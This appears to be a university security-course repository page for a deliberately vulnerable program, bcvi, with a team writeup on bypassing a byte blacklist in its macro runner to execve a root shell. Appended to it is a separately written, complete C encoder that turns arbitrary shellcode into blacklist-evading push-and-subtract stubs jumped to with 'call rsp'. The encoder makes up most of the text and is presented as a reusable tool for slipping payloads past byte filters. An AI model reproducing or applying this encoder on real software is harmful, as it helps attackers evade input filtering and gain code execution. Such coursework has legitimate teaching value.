csci5271/bcvi
Latest commit d7cb704a4a by Michael Zhang, 2018-01-29 17:30:43 -06:00
(commit message: "f"; every file below was last touched by this commit)

Files:
  .vagrant/machines/default/virtualbox
  .vscode
  bcecho.c
  bcvi
  bcvi.1.0.c
  bcvi.1.1.c
  bcvi.1.2.c
  bcvi.1.3.c
  bcvi.c
  bcvi64
  exploit.1.0.sh
  exploit.1.1.sh
  exploit.1.2.sh
  exploit.py
  exploit.sh
  ha1.2.tar.gz
  ha1.3.tar.gz
  incr-macro.txt
  Makefile
  readme.1.1.txt
  readme.txt
  rootshell.c
  setup.sh
  shell-macro.txt
  shellcode
  shellcode-b
  shellcode-b.s
  shellcode.c
  shellcode.s
  shit
  strace.log
  sudobcvi
  sudobcvi.conf
  sudobcvi64
  test
  test.c
  test.symlink
  Vagrantfile
  valgrind.log


           ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
        
                  pwned by Team Shell Smash       
        
           ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Group Members:
  - Michael Zhang (zhan4854)
  - Elliott Beach (beach144)
  - Jegatheeswaran Jerusan (jerus005)

Like last week's exploit, I took advantage of the run_macro function, only this
week's patch had blacklisted 0x05, which is part of the opcode for syscall
(0x0f05). However, it doesn't seem like call was blocked, so I simply pushed the
opcodes required for syscall (0x0f05) onto the stack backwards. Unfortunately,
since 0x05 was blocked, I couldn't push it directly, so I had to push 0x0f06
(in little-endian order, obviously) and then perform a subtraction in order to
have the correct value on the stack. Then with a simple call, I was able to
execve the root shell again!

                                      -Writeup by Michael Zhang
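As an added example, not code from this repository or from the writeup: a small C encoder that generalizes the trick above to any byte blacklist and any shellcode length. For each 8-byte chunk it picks a stand-in value and a delta that both avoid the banned bytes, emits `mov rax, value; mov rcx, delta; sub rax, rcx; push rax` (last chunk first, so the decoded bytes end up contiguous at rsp) followed by `call rsp`, checks that the stub itself contains no banned byte, and then verifies the arithmetic by reconstructing the stack image from the stub rather than executing it. The function names, the 8-byte chunking and the NOP padding are this example's own choices; the writeup's push-immediate-then-subtract is the same idea, but since `push imm32` sign-extends to eight bytes on x86-64 the chunks are assembled through rax so longer payloads stay contiguous. For the writeup's blacklist {0x05} and the bytes 0f 05 the encoder lands on exactly the 0x0f06 / subtract-0x100 pair described above. Actually running the stub needs an executable stack (as the writeup's call into the stack implies) and whatever register setup the surrounding macro did for execve; neither is shown here.

```c
/* Added example, not code from the bcvi repo or the writeup: a generic
 * "push an altered value, subtract the difference, call into the stack"
 * encoder for shellcode bytes that a byte blacklist forbids.  Names, the
 * 8-byte chunking and the NOP padding are choices made for this example. */
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define CHUNK 8     /* one 64-bit push covers 8 bytes of stack */
#define GROUP 24    /* stub bytes emitted per chunk: mov/mov/sub/push */
#define MAX_STUB 512

static bool banned(uint8_t b, const uint8_t *bl, size_t nbl) {
    for (size_t i = 0; i < nbl; i++)
        if (bl[i] == b) return true;
    return false;
}

static uint64_t get_u64(const uint8_t *p) {
    uint64_t v = 0;
    for (int i = 0; i < 8; i++) v |= (uint64_t)p[i] << (8 * i);
    return v;
}

static void put_u64(uint8_t *p, uint64_t v) {
    for (int i = 0; i < 8; i++) p[i] = (uint8_t)(v >> (8 * i));
}

/* Choose delta so that enc = target + delta (mod 2^64) and neither enc nor
 * delta contains a banned byte.  Greedy per byte, low to high, with carry.
 * Target 0f 05 .. with blacklist {05} gives enc 0f 06 .. and delta 0x100. */
static bool find_delta(uint64_t target, const uint8_t *bl, size_t nbl,
                       uint64_t *enc, uint64_t *delta) {
    uint64_t e = 0, d = 0;
    unsigned carry = 0;
    for (int i = 0; i < CHUNK; i++) {
        unsigned t = (unsigned)((target >> (8 * i)) & 0xff);
        bool found = false;
        for (unsigned cand = 0; cand < 256 && !found; cand++) {
            unsigned sum = t + cand + carry;
            if (banned((uint8_t)cand, bl, nbl) ||
                banned((uint8_t)(sum & 0xff), bl, nbl))
                continue;
            e |= (uint64_t)(sum & 0xff) << (8 * i);
            d |= (uint64_t)cand << (8 * i);
            carry = sum >> 8;
            found = true;
        }
        if (!found) return false;
    }
    *enc = e;
    *delta = d;
    return true;
}

/* Emit, for each chunk (last chunk first):
 *   48 B8 <enc>    mov rax, enc      48 B9 <delta>  mov rcx, delta
 *   48 29 C8       sub rax, rcx      50             push rax
 * then FF D4 (call rsp).  Returns the stub length, or 0 if no encoding
 * exists or the stub itself (opcodes or immediates) contains a banned byte. */
static size_t build_stub(const uint8_t *sc, size_t sclen,
                         const uint8_t *bl, size_t nbl,
                         uint8_t *out, size_t outcap) {
    size_t nchunks = (sclen + CHUNK - 1) / CHUNK, pos = 0;
    for (size_t c = nchunks; c-- > 0;) {
        uint8_t chunk[CHUNK];
        memset(chunk, 0x90, CHUNK);                 /* pad tail with NOPs */
        size_t take = sclen - c * CHUNK;
        if (take > CHUNK) take = CHUNK;
        memcpy(chunk, sc + c * CHUNK, take);
        uint64_t enc, delta;
        if (!find_delta(get_u64(chunk), bl, nbl, &enc, &delta)) return 0;
        if (pos + GROUP > outcap) return 0;
        out[pos++] = 0x48; out[pos++] = 0xB8; put_u64(out + pos, enc);   pos += 8;
        out[pos++] = 0x48; out[pos++] = 0xB9; put_u64(out + pos, delta); pos += 8;
        out[pos++] = 0x48; out[pos++] = 0x29; out[pos++] = 0xC8;
        out[pos++] = 0x50;
    }
    if (pos + 2 > outcap) return 0;
    out[pos++] = 0xFF; out[pos++] = 0xD4;
    for (size_t i = 0; i < pos; i++)
        if (banned(out[i], bl, nbl)) return 0;      /* the stub must pass too */
    return pos;
}

/* Reconstruct what the stub leaves at rsp, by re-reading its immediates
 * and doing the subtraction here instead of on an executable stack. */
static size_t simulate_stack(const uint8_t *stub, size_t len,
                             uint8_t *img, size_t cap) {
    if (len < 2 || (len - 2) % GROUP != 0) return 0;
    size_t nchunks = (len - 2) / GROUP;
    if (nchunks * CHUNK > cap) return 0;
    for (size_t g = 0; g < nchunks; g++) {
        const uint8_t *p = stub + g * GROUP;
        uint64_t enc = get_u64(p + 2), delta = get_u64(p + 12);
        put_u64(img + (nchunks - 1 - g) * CHUNK, enc - delta);   /* wraps mod 2^64 */
    }
    return nchunks * CHUNK;
}

/* True if the stub decodes back to the original bytes (NOP-padded). */
static bool check_roundtrip(const uint8_t *sc, size_t sclen,
                            const uint8_t *bl, size_t nbl) {
    uint8_t stub[MAX_STUB], img[MAX_STUB], want[MAX_STUB];
    size_t n = build_stub(sc, sclen, bl, nbl, stub, sizeof stub);
    if (n == 0) return false;
    size_t padded = ((sclen + CHUNK - 1) / CHUNK) * CHUNK;
    if (simulate_stack(stub, n, img, sizeof img) != padded) return false;
    memset(want, 0x90, padded);
    memcpy(want, sc, sclen);
    return memcmp(img, want, padded) == 0;
}

int main(void) {
    const uint8_t syscall_bytes[] = {0x0f, 0x05};   /* constructed input */
    const uint8_t blacklist[] = {0x05};             /* the patch's filter */
    uint8_t stub[MAX_STUB], img[MAX_STUB];
    size_t n = build_stub(syscall_bytes, sizeof syscall_bytes,
                          blacklist, sizeof blacklist, stub, sizeof stub);
    if (n == 0) { puts("no encoding found"); return 1; }
    printf("stub (%zu bytes):", n);
    for (size_t i = 0; i < n; i++) printf(" %02x", stub[i]);
    size_t m = simulate_stack(stub, n, img, sizeof img);
    printf("\nstack at rsp after pushes:");
    for (size_t i = 0; i < m; i++) printf(" %02x", img[i]);
    putchar('\n');
    return 0;
}
```

Adding 0x00 to the blacklist (the usual NUL constraint) makes the per-byte search pick nonzero deltas for every byte, and banning 0x48 makes `build_stub` refuse outright, since the REX prefix of the stub's own instructions is then forbidden; both are the checks a practitioner would want before handing a stub to a filter like the one in the patched run_macro.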